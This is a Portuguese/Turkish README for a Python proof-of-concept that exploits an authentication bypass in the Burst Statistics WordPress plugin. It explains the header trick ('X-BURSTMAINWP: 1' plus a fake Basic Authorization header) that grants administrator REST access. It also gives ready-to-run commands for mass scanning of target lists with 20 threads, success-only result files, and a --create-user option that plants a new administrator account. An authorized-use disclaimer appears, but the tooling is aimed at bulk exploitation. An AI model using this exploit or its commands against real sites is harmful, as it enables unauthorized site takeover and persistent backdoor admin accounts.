
PoC CVE-2026-8181: Burst Statistics (3.4.0–3.4.1.1) bypass de autenticação. Ferramenta Python — varreduras de alvo único e múltiplo, workers com threads, relatórios TXT. Somente testes autorizados. Mantenedor: mürrez.
| Campo | Detalhe |
|---|---|
| O quê | Bypass de autenticação (CWE-287) no Burst Statistics: cabeçalhos manipulados podem escalar requisições REST para contexto de administrador completo. |
| Versões | Vulneráveis: 3.4.0, 3.4.1, 3.4.1.1 · Use: 3.4.2 ou superior |
| Severidade | CVSS ~9.8 (Crítica); remota, não autenticada em condições aplicáveis. |
| Este repositório | CVE-2026-8181.py — automação de laboratório: alvo único, lista em lote, pool de threads, saída TXT seletiva. |
Nota: O número 200.000+ instalações ativas no WordPress.org é a base total de usuários do plugin — isso não significa que todos os sites executam uma versão vulnerável. O impacto real exige verificar versão + ambiente (disponibilidade de HTTP / senha de aplicação, etc.).
| Alan | Detay |
|---|---|
| Ne | Burst Statistics için kimlik doğrulama atlatası (CWE-287). Özel başlıklar ile REST isteğinde tam yönetici bağlamı. |
| Sürüm | Etkilenir: 3.4.0, 3.4.1, 3.4.1.1 · Önerilir: 3.4.2 ve üzeri |
| Ciddiyet | CVSS ~9.8 (Critical); uygun koşullarda uzaktan ve kimlik gerektirmeden. |
| Bu depo | CVE-2026-8181.py — lab otomasyonu: tek hedef, liste taraması, iş parçacığı havuzu, seçici TXT çıktısı. |
Not: WordPress.org’daki 200.000+ aktif kurulum sayısı eklentinin tüm kullanıcı tabanıdır; sitelerin tamamının zafiyetli sürümde olduğu anlamına gelmez. Gerçek etki için sürüm + ortam (HTTP, uygulama parolası uygunluğu vb.) doğrulanmalıdır.
O Markdown do GitHub não incorpora GIFs binários sem um arquivo no repositório. Os trechos de Typing SVG acima (CDN) simulam movimento. Para adicionar sua própria captura de tela:

GitHub Markdown, repoda dosya olmadan GIF gömmeyi desteklemez. Üstteki Typing SVG (CDN) yazı animasyonu verir. Kendi demosun için:

flowchart LR
A[Requisição do cliente] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Ramificação mal tratada| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: contexto de administrador completo]flowchart LR
A[İstek] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Yanlış dal| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: tam admin bağlamı]| Recurso | Descrição |
|---|---|
| Alvo único | -u URL base |
| Alvos em lote | -f targets.txt (uma URL por linha; comentários com #) |
| Concorrência | -j N workers (limitado) |
| Arquivo combinado | -o arquivo.txt — com -f, apenas exploits bem-sucedidos são adicionados |
| Arquivos por host | --output-dir — apenas sucessos recebem host.txt (falhas ignoradas) |
| Novo admin | --create-user — usuário aleatório via REST (senha aparece no relatório) |
| TLS (laboratório) | -k desativa verificação de certificado (apenas laboratórios confiáveis) |
Com -f, -o e --output-dir são mutuamente exclusivos.
| Özellik | Açıklama |
|---|---|
| Tek hedef | -u kök adres |
| Çoklu hedef | -f targets.txt (satır başına URL; # yorumu) |
| Paralellik | -j N işçi (üst sınırlı) |
| Tek dosya | -o dosya.txt — -f ile yalnızca başarılı exploit eklenir |
| Klasör çıktısı | --output-dir — sadece başarılılar host.txt alır |
| Yeni admin | --create-user — REST ile rastgele kullanıcı (şifre raporda) |
| TLS (lab) | -k sertifika doğrulamasını kapatır (yalnızca güvenilir lab) |
-f modunda -o ile --output-dir aynı anda kullanılamaz.
pip3 install requests urllib3
# Site único, arquivo de relatório
python3 CVE-2026-8181.py -u http://lab.local -U admin -o relatorio.txt -k
# Site único + novo admin (laboratório)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o relatorio.txt -k
# Lote + arquivo combinado (apenas sucessos)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o sucessos.txt -k
# Lote + arquivos por host em pasta (apenas sucessos)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./resultados -k
# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k
# Tek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k
# Çoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k
# Çoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
Password: vazio / Boş parola satırıUm bypass bem-sucedido não vaza a senha real do usuário vítima — a senha Basic no PoC é falsa. A linha Password: permanece vazia a menos que --create-user tenha criado uma nova conta (então a senha gerada é escrita).
Başarılı bypass mevcut kullanıcının gerçek parolasını sızdırmaz — PoC’taki Basic parola sahtedir. Password: satırı --create-user ile yeni hesap oluşturulmadıkça boş kalır; oluşturulduysa üretilen şifre yazılır.
Apenas para avaliações com autorização por escrito e seu próprio laboratório. O uso não autorizado é ilegal em muitas jurisdições. Autores e mantenedores deste README não assumem responsabilidade pelo uso indevido.
Yazılı izinli değerlendirmeler ve kendi laboratuvarınız içindir. İzinsiz kullanım birçok ülkede yasadışıdır. Yazarlar ve bu README’nin düzenleyicisi kötüye kullanımdan sorumlu değildir.